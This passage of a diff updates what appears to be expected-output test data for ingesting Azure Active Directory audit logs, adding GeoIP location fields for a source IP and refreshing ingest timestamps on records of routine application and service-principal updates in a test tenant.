Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management 
\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13949,6 +14825,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -14102,7 +14990,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125266700Z", + "ingested": "2021-12-14T14:48:43.176729669Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozi
lla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14129,6 +15017,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -14282,7 +15182,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125272Z", + "ingested": "2021-12-14T14:48:43.176730281Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla
/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14309,6 +15209,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -14462,7 +15374,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125277700Z", + "ingested": "2021-12-14T14:48:43.176731284Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozi
lla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14489,6 +15401,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -14633,7 +15557,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125282400Z", + "ingested": "2021-12-14T14:48:43.176731913Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -14660,6 +15584,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
